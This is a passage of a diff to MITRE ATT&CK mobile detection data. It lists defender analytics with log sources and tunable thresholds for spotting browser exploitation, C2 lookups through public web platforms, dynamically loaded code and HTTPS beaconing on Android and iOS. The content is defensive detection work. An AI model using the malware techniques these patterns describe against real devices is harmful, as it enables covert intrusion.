+                            "field": "ConsentOrSetupGracePeriod",
+                            "description": "Grace period allowed after explicit user enablement of approved accessibility or autofill workflows before injection is treated as suspicious."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-30 16:54:01.193000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--3723c7a3-2ea7-455f-aec5-29300cb7ae64",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0614#AN1669",
+                            "external_id": "AN1669"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1669",
+                    "description": "A defender correlates navigation to external web content in a browser or embedded WebView with immediate script-heavy or exploit-preparation network activity, followed by abnormal browser/WebView process behavior, suspicious file or download artifacts, or rapid post-visit capability shifts such as new package install attempts, overlay prompts, permission requests, or outbound command traffic inconsistent with normal browsing.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "New permission prompt, package install attempt, accessibility/overlay special access request, or other post-browse capability escalation following browser/WebView activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "NavigationToExploitWindow",
+                            "description": "Time window used to correlate web navigation with redirects, fingerprinting, downloads, or post-visit capability changes."
+                        },
+                        {
+                            "field": "AllowedBrowserApps",
+                            "description": "Allow-list of expected browsers or sanctioned WebView-hosting apps used in the enterprise."
+                        },
+                        {
+                            "field": "RedirectChainThreshold",
+                            "description": "Threshold for suspicious number of redirects or cross-domain hops during a single browsing session."
+                        },
+                        {
+                            "field": "NewDomainBurstThreshold",
+                            "description": "Threshold for the number of newly observed domains contacted in a short browsing window."
+                        },
+                        {
+                            "field": "DownloadArtifactThreshold",
+                            "description": "Threshold for suspicious downloaded or cached artifacts created after navigation."
+                        },
+                        {
+                            "field": "PostVisitCapabilityShiftRequired",
+                            "description": "Determines whether to require a new install/prompt/permission/overlay event after browsing to raise confidence."
+                        },
+                        {
+                            "field": "AllowedAdTechDomains",
+                            "description": "Baseline of normal advertising/CDN/tracking domains to reduce false positives from legitimate browsing."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-03-09 17:32:52.483000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--de37eb78-5f35-4327-99d0-ad6546ab0fb6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0614#AN1670",
+                            "external_id": "AN1670"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1670",
+                    "description": "A defender correlates Safari or embedded web content navigation with short-lived but abnormal web session behavior such as staged redirects, environment fingerprinting, or exploit-preparation fetches, followed by browser/WebView instability, unusual file handling, profile/download prompts, or near-term changes in device or application behavior inconsistent with normal browsing.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Post-browse configuration profile prompt, managed/unmanaged app handoff anomaly, or compliance-relevant state change shortly after browser activity"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "NavigationToExploitWindow",
+                            "description": "Time window linking Safari/WebView navigation to redirects, downloads, crashes, or post-visit state changes."
+                        },
+                        {
+                            "field": "AllowedBrowserApps",
+                            "description": "Allow-list of expected browsers and sanctioned embedded web container apps."
+                        },
+                        {
+                            "field": "RedirectChainThreshold",
+                            "description": "Threshold for suspicious redirect depth or cross-domain chaining."
+                        },
+                        {
+                            "field": "FingerprintingRequestThreshold",
+                            "description": "Threshold for suspicious browser/environment enumeration requests during browsing session."
+                        },
+                        {
+                            "field": "DownloadArtifactThreshold",
+                            "description": "Threshold for suspicious downloaded files, profiles, or cached artifacts created after page visit."
+                        },
+                        {
+                            "field": "PostVisitBehaviorShiftThreshold",
+                            "description": "Threshold for abnormal changes in app/device behavior after browsing, such as repeated browser crashes or unexpected handoffs."
+                        },
+                        {
+                            "field": "AllowedAdTechDomains",
+                            "description": "Baseline of expected ad-tech, CDN, and analytics domains to suppress benign browsing noise."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-03-09 17:36:14.306000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--8503331d-09f5-49d3-838c-f0d3b1d55e30",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0617#AN1675",
+                            "external_id": "AN1675"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1675",
+                    "description": "The defender correlates an app-attributed request to a legitimate public web platform with a subsequent outbound connection to a newly derived or previously unseen destination within a short time window. The behavior is strengthened when the initial request retrieves structured or encoded content followed by a pivot to a different domain or IP that was not previously contacted by the app, especially when occurring without user interaction, in background state, or immediately after app initialization or scheduled execution. This sequence reflects resolver retrieval followed by dynamic C2 resolution.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "AppState=background or foreground_service active when resolver retrieval request occurred and pivot connection followed without foreground transition"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before resolver retrieval and subsequent pivot connection sequence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App initiating resolver\u2192pivot sequence was unmanaged or not authorized to communicate with detected web-service class or external infrastructure"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum allowed time between resolver retrieval and pivot connection (e.g., 5\u201360 seconds)."
+                        },
+                        {
+                            "field": "NewDomainThreshold",
+                            "description": "Defines what qualifies as a previously unseen or rare destination for the app or device."
+                        },
+                        {
+                            "field": "AllowedServiceToDestinationMapping",
+                            "description": "Legitimate mappings between apps and expected downstream services."
+                        },
+                        {
+                            "field": "UserInteractionThreshold",
+                            "description": "Defines acceptable delay between user interaction and network activity."
+                        },
+                        {
+                            "field": "PayloadSizeThreshold",
+                            "description": "Small resolver responses followed by larger pivot traffic can indicate extraction behavior."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-03-17 20:48:31.295000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--acc1bb20-bd46-4228-abba-f4befe82e926",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0617#AN1676",
+                            "external_id": "AN1676"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1676",
+                    "description": "The defender correlates a supervised-device or managed-app request to a legitimate web platform with a subsequent connection to a newly derived destination that is not part of the expected service interaction. Because iOS has weaker app-level telemetry, the strongest signal is a network-level sequence where a request to a known public platform is immediately followed by a connection to a different domain or IP, particularly when the device is locked, no recent user interaction occurred, and the bundle is not expected to interact with such downstream infrastructure.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked or BackgroundRefresh active during resolver\u2192pivot sequence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before resolver request and pivot connection sequence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Bundle performing resolver\u2192pivot sequence not present in approved managed-app baseline or lacks expected service relationship"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum allowed time between resolver retrieval and pivot connection."
+                        },
+                        {
+                            "field": "NewDomainThreshold",
+                            "description": "Defines rarity or novelty of domain for the device or bundle."
+                        },
+                        {
+                            "field": "AllowedServiceToDestinationMapping",
+                            "description": "Expected relationships between apps and external services."
+                        },
+                        {
+                            "field": "BackgroundRefreshBaseline",
+                            "description": "Expected background network behavior for managed apps."
+                        },
+                        {
+                            "field": "UserInteractionThreshold",
+                            "description": "Defines acceptable timing between user activity and network requests."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-17 20:56:49.928000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--7b4c77fd-f350-48ec-abce-aac3e35c939f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0618#AN1677",
+                            "external_id": "AN1677"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1677",
+                    "description": "From the defender\u2019s view: an app retrieves opaque code (DEX/SO/JAR/JS) over the network or IPC, writes it into an app-writable path, optionally performs verification-bypass behaviors (reflection, addJavascriptInterface exposure, or execmem friction), and then loads/executes that code via DexClassLoader/PathClassLoader, dlopen, or WebView bridge invocation within a short window. The analytic correlates Network Content \u2192 File Creation/Modification \u2192 OS API Execution (loader/syscall/SELinux friction) \u2192 Module Load (DexClassLoader/dlopen) and, for WebView paths, Application Log signals of JavaScript interface attachment.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max correlation window between download \u2192 write \u2192 load (e.g., 10\u201360s depending on device/workload)."
+                        },
+                        {
+                            "field": "ContentTypeList",
+                            "description": "List of MIME types considered \u2018code-like\u2019 (octet-stream, zip, java-archive, x-dex, x-sharedlib, javascript)."
+                        },
+                        {
+                            "field": "WritablePathRegex",
+                            "description": "Regex for app-writable destinations to watch (/data/data/<pkg>/(files|cache)/, /storage/emulated/0/...)."
+                        },
+                        {
+                            "field": "PayloadEntropyThreshold",
+                            "description": "Entropy cutoff to flag likely code blobs (e.g., \u2265 7.2)."
+                        },
+                        {
+                            "field": "KnownGoodCDNAllowlist",
+                            "description": "CDNs/domains expected for legitimate updates to reduce FPs."
+                        },
+                        {
+                            "field": "KnownGoodLoaderAllowlist",
+                            "description": "Bundles/libs known to legitimately load from writable paths (dev/test apps)."
+                        },
+                        {
+                            "field": "JSInterfaceNameList",
+                            "description": "Names of allowed WebView JS interfaces for the org (e.g., analytics only)."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground/background, Work Profile, dev mode to scope alerts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-01-29 17:21:52.654000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--b6d9d5a1-5966-4888-b4ce-30b125043c4d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0618#AN1678",
+                            "external_id": "AN1678"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1678",
+                    "description": "From the defender\u2019s view: a sandboxed app retrieves code-like content (JS/Mach-O/bundles), writes it to container tmp/Caches, performs memory permission changes (RW\u2192RX/RWX) or directly loads via dyld/dlopen from writable paths, sometimes preceded by 3rd-party hotpatch frameworks (e.g., JSPatch-like behavior) or script engine evaluation. The analytic correlates Network Content \u2192 File Creation \u2192 OS API Execution (memory permission change) \u2192 Module Load (dyld/dlopen) and/or Process Access (codesign validation touches), with optional scripting engine events.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                            "name": "iOS:unifiedlog",
+                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max correlation window between download \u2192 write \u2192 load (e.g., 15\u201360s)."
+                        },
+                        {
+                            "field": "ContentTypeList",
+                            "description": "MIME list treated as code-like (octet-stream, zip, javascript, x-mach-o)."
+                        },
+                        {
+                            "field": "WritablePathRegex",
+                            "description": "Regex for app container tmp/Caches writable paths."
+                        },
+                        {
+                            "field": "PayloadEntropyThreshold",
+                            "description": "Entropy cutoff to flag code blobs (e.g., \u2265 7.3)."
+                        },
+                        {
+                            "field": "KnownJITAllowlist",
+                            "description": "Bundles that legitimately do JIT/script eval to reduce RWX noise."
+                        },
+                        {
+                            "field": "WritableLoadPathRegex",
+                            "description": "Regex for loads from writable paths only (exclude app bundle)."
+                        },
+                        {
+                            "field": "UnsignedExecPolicy",
+                            "description": "Handle enterprise/dev-provisioned unsigned execution contexts."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground/background or Work Profile state to filter noise."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-01-29 17:39:29.213000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f12b94b0-ec2f-4eb1-9ea4-8632e41475a1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0620#AN1681",
+                            "external_id": "AN1681"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1681",
+                    "description": "Defender observes an application establishing recurrent HTTPS or FCM-based communication sessions exhibiting structured cadence, asymmetric request/response sizes, or persistent low-volume polling inconsistent with declared application functionality, potentially embedding command data within web protocol traffic.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "BeaconIntervalVarianceThreshold",
+                            "description": "Defines acceptable deviation in HTTPS polling cadence"
+                        },
+                        {
+                            "field": "PayloadSymmetryThreshold",
+                            "description": "Defines acceptable ratio between request and response sizes"
+                        },
+                        {
+                            "field": "AppNetworkRoleBaseline",
+                            "description": "Expected mapping between application category and network endpoints"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-03-02 20:39:33.682000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--a16c57b3-6a4c-4b15-92e9-d2d29f5b7d69",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0620#AN1682",
+                            "external_id": "AN1682"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1682",
+                    "description": "Defender observes an application establishing recurrent HTTPS or APNS-related communications exhibiting structured cadence, abnormal session persistence, or notification-triggered network bursts inconsistent with user interaction patterns or declared application behavior.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "NotificationWakeFrequencyThreshold",
+                            "description": "Baseline deviation tolerance for background wake events"
+                        },
+                        {
+                            "field": "HTTPSCadenceAnomalyThreshold",
+                            "description": "Acceptable deviation in recurring web traffic timing"
+                        },
+                        {
+                            "field": "SessionPersistenceThreshold",
+                            "description": "Threshold for abnormal TLS session duration"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-02 20:40:39.182000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--7f84f2b8-6ef3-4167-b059-a455d7c40a7d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0621#AN1683",
+                            "external_id": "AN1683"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1683",
